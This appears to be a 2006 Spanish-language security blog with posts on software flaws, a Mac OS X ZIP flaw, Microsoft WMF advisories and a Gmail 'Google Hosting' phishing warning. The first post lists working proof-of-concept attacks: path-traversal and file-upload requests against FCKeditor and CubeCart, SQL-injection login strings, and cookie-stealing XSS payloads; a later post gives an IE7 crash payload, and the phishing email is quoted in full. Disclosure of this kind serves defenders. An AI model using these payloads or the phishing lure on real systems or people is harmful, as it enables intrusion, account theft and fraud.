ecoestadistica.com

martes, febrero 28, 2006

Vulnerabilidades...

FCKeditor 2.0 FC

Prueba de Concepto:

http://SERVER/filemanager/browser/default/connectors/php/connector.
php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=../../

http://SERVER/filemanager/browser/default/connectors/php/connector.
php?Command=CreateFolder&Type=File&CurrentFolder=../..
/&NewFolderName=TESTNAME

---------------------------------------------------------------------------------------------------

CubeCart 3.0.0 – 3.0.6

Exploit:
form
action="http:
//host/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/p
hp/connector.php?Command=FileUpload&Type=File&CurrentFolder=/"
method="POST" enctype="multipart/form-data">
File Upload

input id="txtFileUpload" type="file" name="NewFile">
br>
input type="submit" value="Upload">
/form>

-------------------------------------------------------------------------------------------------

Oi! Email Marketing 3.0 SQL Injection

Prueba de Concepto:

http://www.site.com/oi/index.php

Username : username' OR '

Password : ' OR '

-------------------------------------------------------------------------------------------------

Woltlab Burning Board 2.x (JGS-Gallery MOD <= 4.0) multiple XSS

Prueba de Concepto:

GET -> http://site/jgs_galerie_slideshow.php?sid=&katid=&userid=XSS
EJEMPLO -> http://site/jgs_galerie_slideshow.php?sid=&katid=&userid=scriptalert('X');/scri
pt
GET -> http://site/jgs_galerie_scroll.php?userid=XSS
EJEMPLO ->
http://site/jgs_galerie_scroll.php?userid=scriptalert('X');/script
GET -> http://site/jgs_galerie_slideshow.php?sid=&katid=XSS&userid=
EJEMPLO ->
http://site/jgs_galerie_slideshow.php?sid=&katid=scriptalert('X');/script&userid=

-------------------------------------------------------------------------------------------------

EJ3 TOPo Cross Site Scripting Vulnerability

Prueba de Concepto :
access /code/inc_header.php like
inc_header.php?gTopNombre=“>scriptalert(document.
cookie)/script

-------------------------------------------------------------------------------------------------

CGI Calendar XSS Vulnerability

Exploit:
/cgi-bin/calendar2/index.cgi?lang=en-
us&mode=all&month=2&date=1&year=scriptalert('xss&
#39;);/script&db=1

/cgi-bin/calendar2/viewday.cgi?lang=en-
us&mode=all&month=2&date=1&year=scriptalert('xss&
#39;);/script&db=1

-------------------------------------------------------------------------------------------------




domingo, febrero 26, 2006

Vulnerabilidad crítica en Mac OS X

Malos tiempos para los usuarios de Mac. Pocos días después de la aparición de los dos primeros troyanos para Mac OS X (separados entre sí tan sólo 24 horas) se presenta hoy una vulnerabilidad extremadamente crítica, ya que permite ejecutar código ajeno desde una página web sin ninguna participación del usuario.

Aunque el fallo se atribuyó en un primer momento a Safari, las últimas informaciones hablan de que la vulnerabilidad podría ser bastante más profunda...

El problema radica en el procesamiento de los metadatos asociados a ficheros ZIP, que puede permitir la ejecución de un script malicioso sin más que dotarlo de una extensión considerada segura y meterlo en un fichero ZIP.

Fuente:kriptopolis.org

Salu2

martes, febrero 14, 2006

Nuevas actualizaciones de Microsoft...

Microsoft está investigando una vulnerabilidad relacionada con
archivos Windows Metafile (WMF). Esta vulnerabilidad NO está
relacionada con las descriptas en los boletines de seguridad MS05-053
de noviembre de 2005 ni MS06-001 de enero 2006.
Los componentes afectados IE 5.01 e IE 5.5 ya no tienen soporte
oficial de Microsoft por lo que la empresa determinará si es necesaria
la liberación de una actualización.
Mientras tanto se recomienda actualizar a una versión de IE no
vulnerable.
Puede verse un listado de actualizaciones disponibles en:
http://www.segu-info.com.ar/msupdate/msupdate.htm
http://www.microsoft.com/technet/security/advisory/913333.mspx

Además Microsoft ha anunciado al menos 7 actualizaciones de seguridad
para el próximo martes 14 de febrero.
Como siempre la recomendación es actualizar. Más vale prevenir...
Puede consultarse el listado de actualizaciones en:
http://www.microsoft.com/technet/security/bulletin/advance.mspx

Salu2

Estafa a los usuarios de GMail sobre Google Hosting

La asociación de internautas hace un llamamiento a los usuarios de GMail advirtiéndoles de que no hagan caso a correos donde se indique que GMail ofrece alojamiento web, donde insta a los usuarios a rellenar un formulario. Este formulario no pertenece a GMail sino más bien a una web fraudulenta, un claro caso de phishing, suplantación de identidad, con el fín de robar las claves de las cuentas de GMail.

En realidad la web pertenece al dominio HACKDARK.COM, que aún sigue activa y alojada en LYCOS España, a los que ya se le ha avisado por parte de la asociación. Se recuerda a los internautas que no deben de pinchar el enlace sin antes haber comprobado su veracidad y luego dentro comprobar su certificado de autentificación.

Este es el tipo de correo que han llegado ya a varios usuarios:

*****INICIO******
Equipo de Gmail wrote:

———————————————————————————————————-
Le han invitado a crear una cuenta de Google Hosting gratuita.

Para aceptar esta invitación y registrarse en su cuenta, visite
http://hosting.google.com/hosting/a-6f545094e9-574eefa3f7-359e5efe38

Si todavía no conoce Google Hosting, se trata de un nuevo servicio de hosting
gratuito basado con estos servicios:

- Espacio & Transferencia:
100 MB de espacio en disco
1 GB de transferencia mensual

- Base de Datos:
2 bases de datos MySQL
Herramienta phpMyAdmin de administración de bases de datos

- Características de Correo:
25 cuentas POP
25 redireccionadores (reenvío de correo)
25 contestadores automáticos
Servidor SMTP personal

- Software & Scripting:
Directorio CGI-BIN propio
PHP
Bases de datos MySQL
SSI, SSL (servidor seguro https://)
Perl scripting
Javascript
Soporte Flash
Python

- Herramientas de Administración:
Acceso FTP ilimitado
Extensiones FrontPage®
Estadísticas Web y FTP
Administrador de archivos vía web

Google Hosting se encuentra todavía en su fase inicial de desarrollo. Sin
embargo, si configura una cuenta, podrá mantenerla incluso después de
que Google Hosting esté disponible de forma más general. Es probable que
solicitemos que nos haga llegar sus comentarios y sugerencias.
Esperamos contar con su ayuda para mejorar Google Hosting.

Gracias,

El equipo de Gmail

*****FINAL******

Fuente | Internautas.org

Salu2

jueves, febrero 02, 2006

Primera Vulnerabilidad para el BETA de IE7...

Version Afectada:
Internet Explorer 7,0 2 Beta (7,0,5296,0)

Descripcion:
Una vulnerabilidad del tipo DOS (denegacion de servicio), existe dentro del Internet Explorer beta 7.0.2 que causa que el navegador se ¨cuelgue¨ y eventualmente ejecutar codigo malicioso en el sistema de la victima.

Detalles:
Al ejecutarse un archivo HTML especialmente creado,urlmon.dll no analiza correctamente el 'BGSOUND SRC=file://---' (aprox.344 dashes), produciendo el desplome del navegador.

Prueba de Concepto:
El siguiente codigo html produce el ¨cuelgue¨:

BGSOUND
SRC=file://---------------------------------------------------------------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
---------------------------------- >

PRUEBA

descubierto por Tom Ferris.

Salu2

ecoestadistica.com